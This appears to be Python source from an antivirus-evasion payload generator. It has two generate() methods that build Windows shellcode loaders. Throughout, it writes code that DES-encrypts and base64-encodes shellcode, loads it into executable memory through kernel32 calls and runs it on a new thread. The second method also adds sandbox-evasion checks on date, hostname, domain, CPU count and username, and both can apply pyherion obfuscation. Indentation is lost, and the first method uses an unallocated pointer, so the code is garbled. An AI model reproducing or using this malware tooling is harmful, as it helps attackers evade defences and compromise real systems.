def generate(self):
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
RandDESPayload = evasion_helpers.randomString()
RandEncShellCodePayload = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# encrypt the shellcode and get our randomized key
encoded_ciphertext, encryption_key, iv_value = encryption.des_encryption(
Shellcode)
encoded_ciphertext = encoded_ciphertext.decode('ascii')
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# Create Payload File
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
# Generate Random Variable Names
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code = ''
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
RandPtr = evasion_helpers.randomString()
RandHt = evasion_helpers.randomString()
RandDESPayload = evasion_helpers.randomString()
RandEncShellCodePayload = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
rand_hostname = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import platform\n'
payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[
"HOSTNAME"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["DOMAIN"][0].lower() != "x":
rand_domain = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import socket\n'
payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[
"DOMAIN"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
rand_processor_count = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[
"PROCESSORS"][0] + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import getpass\n'
payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[
"USERNAME"][
0] + '\'.lower() in ' + rand_user_name + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
# encrypt the shellcode and get our randomized key
encoded_ciphertext, encryption_key, iv_value = encryption.des_encryption(
Shellcode)
encoded_ciphertext = encoded_ciphertext.decode('ascii')
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# Create Payload File
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
# Generate Random Variable Names
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return